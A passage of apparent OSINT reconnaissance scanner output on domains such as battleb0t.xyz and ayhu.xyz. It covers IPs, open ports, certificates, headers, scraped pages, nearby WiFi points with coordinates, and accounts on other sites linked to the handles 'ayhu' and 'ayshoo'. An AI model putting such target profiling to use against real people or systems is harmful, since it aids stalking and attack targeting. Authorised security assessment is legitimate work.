3d:17:14:59:24:3e:50:d8:45:4a:75:44:e1:73:c8:35:32:f2:
12:9e:aa:4b:a4:d5:91:49:4b:5d:ba:80:98:b5:1e:6a:11:cf:
b0:5f:4d:0f:57:ad:69:b3:6b:16:1c:dd:75:b2:fe:57:1f:11:
ae:d7:db:50:93:3c:e1:e8:26:9c:cc:0a:18:7c:b4:5d:5b:33:
d4:f5:18:f8:96:6e:cb:73:1d:80:63:f6:bb:c8:51:5e:dd:31:
fe:d5:d8:6f:b8:13:03:f9:14:44:36:23:9a:a2:41:54:b4:39:
df:20:21:8b:35:e6:b5:0b:7c:63:1f:77:c7:00:93:73:7a:f3:
93:fe:79:56
|
| 2023-05-12 03:24:52 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Turkey | Bursa, Bursa, 16, Turkey, TR |
| 2023-05-12 02:45:22 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, VA, United States, US | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | SoundCloud (Category: music)
https://soundcloud.com/ayshoo | ayshoo |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | crowdin (Category: hobby)
https://crowdin.com/profile/login | login |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 121.97.148.34.bc.googleusercontent.com | 34.148.97.121 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://nwapi.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | xfinitywifi (Net ID: 00:0D:67:37:7A:7A) | 39.0469, -77.4903 |
| 2023-05-12 03:09:07 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 165.232.113.89 | 165.232.113.85 |
| 2023-05-12 03:00:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.37): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | ExtraLunchMoney (Category: XXXPORNXXX)
https://extralunchmoney.com/user/login | login |
| 2023-05-12 02:44:15 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:32:07.311 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:AA:9D:DE:C7:1A:03:CE:A4:C0:00:4F:
87:A8:C3:99:28:44:9B:D2:01:EB:31:A5:4D:CA:E6:87:
EC:A0:EC:55:A7:02:20:46:FF:BE:46:93:AD:B8:EF:FE:
25:F8:15:56:F7:DA:CF:93:CC:B6:57:60:7E:B3:1F:4E:
3D:D7:BC:FE:3F:5C:95
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:32:07.904 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:37:07:AC:16:A5:95:2E:57:A3:0B:B3:64:
CD:EA:6B:54:2E:81:8A:01:52:42:FF:1C:53:89:7A:D2:
6B:24:50:80:02:20:40:76:C6:34:39:4A:07:B1:8F:D5:
9F:21:37:77:6A:98:1B:06:80:4F:64:F6:8D:4F:C6:A8:
76:64:CB:D7:21:98
Signature Algorithm: sha256WithRSAEncryption
5a:91:30:6e:b9:53:94:e1:7e:bb:e0:98:45:df:78:b3:43:5d:
de:b7:e8:48:7b:6b:85:d8:3d:1f:0c:8e:55:6a:96:e0:1e:5a:
3f:a6:43:96:72:8b:0f:19:07:ee:9c:42:c7:4a:fa:00:d6:38:
45:8a:ea:1d:27:96:1c:3b:da:42:ff:fd:72:61:04:85:27:14:
44:a3:15:9a:66:dc:fe:95:f3:8c:98:0f:18:5b:f9:85:a2:67:
99:97:5a:de:6b:1e:8a:f6:0f:26:41:36:b4:b1:3e:27:57:59:
6e:d6:c4:ee:ce:b2:6c:21:fe:aa:fe:21:90:56:0b:ea:b9:fb:
42:2f:c1:77:37:3f:05:10:f5:44:c7:f2:f2:69:75:ed:35:ad:
bf:14:45:0f:8e:50:cc:75:c2:b4:48:82:8d:27:02:be:21:98:
49:ee:ec:f9:0b:27:d8:83:27:62:ad:0a:7b:66:8c:06:c8:72:
57:56:3c:6b:ac:63:49:11:4f:62:ea:70:01:53:cf:56:53:4b:
71:08:c9:75:ee:50:8f:d1:87:f6:68:91:33:35:2a:99:1f:6e:
f5:48:cb:c7:f5:99:a1:3f:39:b8:fe:33:3a:31:fe:e7:7d:d5:
4e:6f:92:4f:57:86:fc:b0:8f:23:98:3e:8f:91:f6:d5:3d:5c:
a6:e5:1c:71
| battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ThermiCam2Production TRC (Net ID: 00:05:FE:C6:35:F0) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:27 | Physical Location | No | URLScan.io | 0 | 0 | 1 | 0 | None | US | ayhu.xyz |
| 2023-05-12 02:54:18 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | pics.battleb0t.xyz |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 0 | 0 | 3 | 0 | None | *{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131}html,button{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,"Apple Color Emoji","Segoe UI Emoji",Segoe UI Symbol,"Noto Color Emoji"}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.hidden{display:none}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon{margin-right:.5rem;width:2rem;height:2rem}@media (max-width: 720px){.main-content{margin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-height:3.75rem;font-size:2.5rem;font-weight:500}.h2{line-height:2.25rem;font-size:1.5rem;font-weight:500}.core-msg{line-height:2.25rem;font-size:1.5rem;font-weight:400}.body-text{line-height:1.25rem;font-size:1rem;font-weight:400}.expandable-title{line-height:1.5rem;font-weight:500}@media (max-width: 720px){.h1{line-height:1.75rem;font-size:1.5rem}.h2{line-height:1.5rem;font-size:1.25rem}.core-msg{line-height:1.5rem;font-size:1rem}}.icon-wrapper{display:inline-block;position:relative;top:.25rem;margin-right:.2rem}.heading-icon{width:1.625rem;height:1.625rem}@media (max-width: 720px){.heading-icon{width:1.25rem;height:1.25rem}}.warning-icon{display:inline-block;background-image:url(data:image/png;base64,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);background-size:cover}.text-center{text-align:center}.expandable{transition:height,border-left .2s;border-left:.125rem solid 
#e5e5e5;padding-left:.5rem}.expandable.expanded{border-left-color:#0051c3}.expandable-summary-btn{border:none;background:none;cursor:pointer;padding:0;color:inherit;font:inherit}.expandable-details{display:none;padding:.5rem 0}.expanded>.expandable-details{display:block}.caret-icon{display:inline-block;transition:transform .2s;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgBAMAAACBVGfHAAAAElBMVEUAAAAwMDAxMTEyMjIwMDAxMTF+89HTAAAABXRSTlMAgF9/MMasjJIAAABTSURBVCjPzcq7DcAwDANR5TOAm/Rp0meErBAD3n8VW8DBt4JZUALxYp18vmfWUR2ed9TW7iB7K3muOsGfDRFAABKABCABSAASgAQgAUgAkhKLpwMJmwrD+BDiYwAAAABJRU5ErkJggg==);background-size:contain;width:1rem;height:1rem}.caret-icon-wrapper{position:relative;top:.1rem;margin-left:.2rem}.expanded .caret-icon{transform:rotate(180deg)}.big-button{transition-duration:.2s;transition-property:background-color,border-color,color;transition-timing-function:ease;border:.063rem solid #0051c3;border-radius:.313rem;padding:.375rem 1rem;line-height:1.313rem;font-size:.875rem}.big-button:hover{cursor:pointer}.captcha-prompt:not(.hidden){display:flex}@media (max-width: 720px){.captcha-prompt:not(.hidden){flex-wrap:wrap;justify-content:center}}.pow-button{margin:2rem 0;background-color:#0051c3;color:#fff}.pow-button:hover{border-color:#003681;background-color:#003681;color:#fff}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.ip-address{margin-left:2.25rem}.clearfix:after{display:table;clear:both;content:""}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width: 
720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:initial;clear:none;text-align:center;content:none}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative;width:1.875rem;height:1.875rem}.lds-ring div{box-sizing:border-box;display:block;position:absolute;border:.3rem solid #595959;border-radius:50%;border-color:#595959 transparent transparent;width:1.875rem;height:1.875rem;animation:lds-ring 1.2s cubic-bezier(.5,0,.5,1) infinite}.lds-ring div:nth-child(1){animation-delay:-.45s}.lds-ring div:nth-child(2){animation-delay:-.3s}.lds-ring div:nth-child(3){animation-delay:-.15s}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast: active),screen and (-ms-high-contrast: none){body,.main-wrapper{display:block}}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}@media (prefers-color-scheme: dark){body{background-color:#222;color:#d9d9d9}a{color:#fff}a:hover{text-decoration:underline;color:#ee730a}.lds-ring div{border-color:#999 transparent transparent}.font-red{color:#fc574a}.big-button,.pow-button{background-color:#4693ff;color:#1d1d1d}.expandable.expanded{border-left-color:#4693ff}}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{text-decoration:underline;color:#ee730a}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark .expandable.expanded{border-left-color:#4693ff}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{text-decoration:underline;color:#ee730a}body.light .lds-ring div{border-color:#595959 transparent transparent}body.light 
.font-red{color:#fc574a}body.light .big-button,body.light .pow-button{border-color:#003681;background-color:#003681;color:#fff}body.light .expandable.expanded{border-left-color:#0051c3} | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:80 | 188.114.96.0/24 |
| 2023-05-12 02:45:34 | DNS TXT Record | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | v=spf1 include:_spf.mx.cloudflare.net ~all | battleb0t.xyz |
| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:8080 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | my_instants (Category: music)
https://www.myinstants.com/en/profile/login/ | login |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.176): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | hk (Net ID: 00:02:A8:1F:B9:47) | 50.1188, 8.6843 |
| 2023-05-12 03:23:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.7:8443 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetFBC6 (Net ID: 00:01:36:5A:FB:C4) | 37.780462,-122.390564 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | ecash-pay.com |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cf-ray: 7c5f60726fad1912-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:53:07 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.154:80 | 185.199.111.0/24 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social)
https://twitter.com/ayhu | ayhu |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5e66b449bc299e-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 02:53:35 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.110.153:443 | 185.199.110.153 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007.github.io | 185.199.111.153 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.220): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:19 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://fluid.battleb0t.xyz/./script.js |
| 2023-05-12 02:53:02 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | nwapi.battleb0t.xyz |
| 2023-05-12 02:54:30 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 64.226.81.43 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Frodo (Net ID: 00:02:2D:25:7C:6A) | 37.7642, -122.3993 |
| 2023-05-12 02:47:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://software.verapdf.org/dev/verapdf_windows-x64_1_18-rc.exe', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"docs.verapdf.org"\n "maxcdn.bootstrapcdn.com"\n "software.verapdf.org"\n "staging.verapdf.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.104.134.96:80"\n "172.104.134.96:443"\n "104.18.11.207:443"\n "172.64.132.15:443"\n "185.199.111.153:80"\n "142.250.189.202:443"\n "185.199.111.153:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f2c_IESQMMUTEX_0_519"\n "IsoScope_f2c_IE_EarlyTabStart_0x9b4_Mutex"\n "IsoScope_f2c_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n 
"Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3884"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_f2c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f2c_ConnHashTable<3884>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f2c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"software.verapdf.org"\n "docs.verapdf.org"\n "staging.verapdf.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarD2EE.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /dev/verapdf_windows-x64_1_18-rc.exe HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 
